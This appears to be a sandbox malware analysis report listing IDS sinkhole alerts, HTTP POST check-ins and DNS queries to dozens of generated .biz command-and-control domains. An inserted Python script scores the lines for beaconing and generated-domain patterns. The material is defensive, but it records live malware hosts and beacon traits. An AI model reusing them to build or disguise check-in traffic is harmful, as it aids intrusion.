      Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.22:49179
      Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.22:49179
      Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.22:49168
      Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.22:49168
      Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.22:49177
      Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.22:49177
      Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.246.231.120:80 -> 192.168.2.22:49196
      Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.246.231.120:80 -> 192.168.2.22:49196
      Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 35.164.78.200:80 -> 192.168.2.22:49188
      Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 35.164.78.200:80 -> 192.168.2.22:49188
      Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.22:49189
      Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.22:49189
      Source: global traffic | HTTP traffic detected: POST /qbdegkuges HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: pywolwnvd.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 852
      Source: global traffic | HTTP traffic detected: POST /qbdegkuges HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: pywolwnvd.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 808
      Source: global traffic | HTTP traffic detected: POST /bpewylwxymwihal HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: ssbzmoy.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 808
      Source: global traffic | HTTP traffic detected: POST /xuofommcmtwcs HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: ssbzmoy.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 852
      Source: global traffic | HTTP traffic detected: POST /dyk HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: cvgrf.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 852
      Source: global traffic | HTTP traffic detected: POST /xtaadg HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: npukfztj.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 852
      Source: global traffic | HTTP traffic detected: POST /nabdw HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: przvgke.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 852
      Source: global traffic | HTTP traffic detected: POST /vccrolpmtjge HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: przvgke.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 852
      Source: global traffic | HTTP traffic detected: POST /ydlpotfktdldc HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: knjghuig.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 852
      Source: global traffic | HTTP traffic detected: POST /m HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: lpuegx.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 852
      Source: global traffic | HTTP traffic detected: POST /prfudb HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: lpuegx.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 852
      Source: global traffic | HTTP traffic detected: POST /qmufc HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: vjaxhpbji.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 852
      Source: global traffic | HTTP traffic detected: POST /webejpnbfwojkbv HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: vjaxhpbji.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 852
      Source: global traffic | HTTP traffic detected: POST /p HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: xlfhhhm.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 852
      Source: global traffic | HTTP traffic detected: POST /rkqa HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: ifsaia.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /ovknk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /nm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /hwxehcd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /kbtuvb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /ebyryipv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /vhlxvyk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /aphnqtgnwfpgg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /cmjndgqt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /nqtlxhjrub HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /tgcwttfqletfhyq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /tgcwttfqletfhyq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /tgcwttfqletfhyq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /tgcwttfqletfhyq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /tgcwttfqletfhyq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /tgcwttfqletfhyq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /tgcwttfqletfhyq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /tgcwttfqletfhyq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /tgcwttfqletfhyq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /tgcwttfqletfhyq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /tgcwttfqletfhyq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global trafficHTTP traffic detected: POST /tgcwttfqletfhyq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 852
      Source: global traffic | DNS traffic detected: DNS query: pywolwnvd.biz
      Source: global traffic | DNS traffic detected: DNS query: ssbzmoy.biz
      Source: global traffic | DNS traffic detected: DNS query: cvgrf.biz
      Source: global traffic | DNS traffic detected: DNS query: npukfztj.biz
      Source: global traffic | DNS traffic detected: DNS query: przvgke.biz
      Source: global traffic | DNS traffic detected: DNS query: zlenh.biz
      Source: global traffic | DNS traffic detected: DNS query: knjghuig.biz
      Source: global traffic | DNS traffic detected: DNS query: uhxqin.biz
      Source: global traffic | DNS traffic detected: DNS query: anpmnmxo.biz
      Source: global traffic | DNS traffic detected: DNS query: lpuegx.biz
      Source: global traffic | DNS traffic detected: DNS query: vjaxhpbji.biz
      Source: global traffic | DNS traffic detected: DNS query: xlfhhhm.biz
      Source: global traffic | DNS traffic detected: DNS query: ifsaia.biz
      Source: global traffic | DNS traffic detected: DNS query: saytjshyf.biz
      Source: global traffic | DNS traffic detected: DNS query: vcddkls.biz
      Source: global traffic | DNS traffic detected: DNS query: fwiwk.biz
      Source: global traffic | DNS traffic detected: DNS query: tbjrpv.biz
      Source: global traffic | DNS traffic detected: DNS query: deoci.biz
      Source: global traffic | DNS traffic detected: DNS query: gytujflc.biz
      Source: global traffic | DNS traffic detected: DNS query: qaynky.biz
      Source: global traffic | DNS traffic detected: DNS query: bumxkqgxu.biz
      Source: global traffic | DNS traffic detected: DNS query: dwrqljrr.biz
      Source: global traffic | DNS traffic detected: DNS query: nqwjmb.biz
      Source: global traffic | DNS traffic detected: DNS query: ytctnunms.biz
      Source: global traffic | DNS traffic detected: DNS query: myups.biz
      Source: global traffic | DNS traffic detected: DNS query: oshhkdluh.biz
      Source: global traffic | DNS traffic detected: DNS query: yunalwv.biz
      Source: global traffic | DNS traffic detected: DNS query: jpskm.biz
      Source: global traffic | DNS traffic detected: DNS query: lrxdmhrr.biz
      Source: global traffic | DNS traffic detected: DNS query: wllvnzb.biz
      Source: global traffic | DNS traffic detected: DNS query: gnqgo.biz
      Source: global traffic | DNS traffic detected: DNS query: jhvzpcfg.biz
      Source: global traffic | DNS traffic detected: DNS query: acwjcqqv.biz
      Source: global traffic | DNS traffic detected: DNS query: lejtdj.biz
      Source: global traffic | DNS traffic detected: DNS query: vyome.biz
      Source: global traffic | DNS traffic detected: DNS query: yauexmxk.biz
      Source: global traffic | DNS traffic detected: DNS query: iuzpxe.biz
      Source: unknown | HTTP traffic detected: POST /qbdegkuges HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: pywolwnvd.biz | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 | Content-Length: 852
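The request lines above, including the one whose source the sandbox could not attribute, all share one User-Agent string, one Content-Length of 852 and a short lowercase path, spread over dozens of .biz hosts, with the same path (/tgcwttfqletfhyq) retried against twelve hosts in a row; the DNS list shows those domains being resolved one after another. The following is an added example, not part of the Joe Sandbox report or of the sample it describes: it parses lines in this report's own format, profiles the requests per User-Agent, and applies a crude vowel-ratio test to the queried domains. The sample lines are constructed from a subset of the hosts and paths listed on this page; the thresholds (at least 5 hosts, vowel ratio below 0.3, a run of 4 consonants) are assumptions for illustration, not FormBook-specific knowledge.

```python
"""Extract the HTTP check-in and DNS indicators from Joe Sandbox-style report
lines and score them for the pattern visible in this report: one fixed
User-Agent, one fixed Content-Length, short lowercase paths, many throw-away
domains. Added example; not part of the sandbox report or the analysed sample."""
import re
from collections import defaultdict

# The regexes tolerate the run-together form used in the report
# ("Host: ssbzmoy.bizUser-Agent: ...") as well as space- or '|'-separated text.
RE_REQ = re.compile(r"\b(POST|GET)\s+(/\S*?)\s+HTTP/1\.[01]")
RE_HOST = re.compile(r"Host:\s*([a-z0-9-]+(?:\.[a-z0-9-]+)+)")
RE_UA = re.compile(r"User-Agent:\s*(.*?)\s*(?:\||Content-Length:|$)")
RE_CLEN = re.compile(r"Content-Length:\s*(\d+)")
RE_DNS = re.compile(r"DNS query:\s*([a-z0-9-]+(?:\.[a-z0-9-]+)+)")
VOWELS = set("aeiou")

# Constructed sample: a subset of the hosts/paths listed in this report, laid
# out in the report's line format with header fields separated by spaces.
UA = ("Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
      "Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI "
      "WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400")
_POSTS = [("ssbzmoy.biz", "/xuofommcmtwcs"), ("cvgrf.biz", "/dyk"),
          ("npukfztj.biz", "/xtaadg"), ("przvgke.biz", "/nabdw"),
          ("przvgke.biz", "/vccrolpmtjge"), ("knjghuig.biz", "/ydlpotfktdldc"),
          ("lpuegx.biz", "/m"), ("pywolwnvd.biz", "/qbdegkuges")]
_DNS = ["pywolwnvd.biz", "ssbzmoy.biz", "cvgrf.biz", "npukfztj.biz", "przvgke.biz",
        "zlenh.biz", "knjghuig.biz", "uhxqin.biz", "anpmnmxo.biz", "lpuegx.biz",
        "ifsaia.biz", "deoci.biz"]
SAMPLE_LINES = [
    f"Source: global traffic HTTP traffic detected: POST {p} HTTP/1.1 Cache-Control: no-cache "
    f"Connection: Keep-Alive Pragma: no-cache Host: {h} User-Agent: {UA} Content-Length: 852"
    for h, p in _POSTS
] + [f"Source: global traffic DNS traffic detected: DNS query: {d}" for d in _DNS]


def parse_http(lines):
    """One record per request line: method, path, host, User-Agent, Content-Length."""
    recs = []
    for line in lines:
        m = RE_REQ.search(line)
        if not m:
            continue
        host, ua, clen = RE_HOST.search(line), RE_UA.search(line), RE_CLEN.search(line)
        recs.append({"method": m.group(1), "path": m.group(2),
                     "host": host.group(1) if host else None,
                     "ua": ua.group(1) if ua else None,
                     "clen": int(clen.group(1)) if clen else None})
    return recs


def beacon_profile(recs):
    """Per User-Agent: how many hosts/paths were used and whether the body size
    is constant. Browsers vary Content-Length and reuse hosts; a check-in loop
    that posts one fixed-size blob to a list of domains does not."""
    by_ua = defaultdict(list)
    for r in recs:
        by_ua[r["ua"]].append(r)
    profiles = {}
    for ua, group in by_ua.items():
        hosts = {r["host"] for r in group}
        paths = {r["path"] for r in group}
        clens = {r["clen"] for r in group}
        random_paths = all(re.fullmatch(r"/[a-z]{1,16}", p) for p in paths)
        profiles[ua] = {
            "requests": len(group), "hosts": len(hosts), "paths": len(paths),
            "content_lengths": sorted(clens), "random_paths": random_paths,
            # Assumed thresholds: >= 5 hosts, one body size, lowercase-only paths.
            "beacon_like": len(hosts) >= 5 and len(clens) == 1 and random_paths,
        }
    return profiles


def looks_generated(label):
    """Crude DGA test on one DNS label: vowel-poor, or a run of 4+ consonants."""
    letters = [c for c in label.lower() if c.isalpha()]
    if not letters:
        return False
    vowel_ratio = sum(c in VOWELS for c in letters) / len(letters)
    run = longest = 0
    for c in letters:
        run = 0 if c in VOWELS else run + 1
        longest = max(longest, run)
    return vowel_ratio < 0.3 or longest >= 4


def dga_fraction(lines):
    """Share of queried domains whose second-level label looks machine-generated."""
    domains = {m.group(1) for m in map(RE_DNS.search, lines) if m}
    if not domains:
        return 0.0
    return sum(looks_generated(d.split(".")[-2]) for d in domains) / len(domains)


if __name__ == "__main__":
    for ua, prof in beacon_profile(parse_http(SAMPLE_LINES)).items():
        print(f"{ua[:40]}...: {prof}")
    print(f"generated-looking domains: {dga_fraction(SAMPLE_LINES):.0%}")
```

The per-User-Agent grouping is the part worth keeping: a fixed Content-Length across many distinct hosts is a stronger signal than any single domain, since the domains here are disposable and most of them return 404 anyway (see the responses below). The vowel-ratio test is deliberately simple and will miss pronounceable generated names such as ifsaia or deoci; it is meant to rank a query list, not to act as a blocklist.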
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.14.0 (Ubuntu) | Date: Thu, 28 Nov 2024 11:13:52 GMT | Content-Type: text/html | Content-Length: 580 | Connection: keep-alive | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable 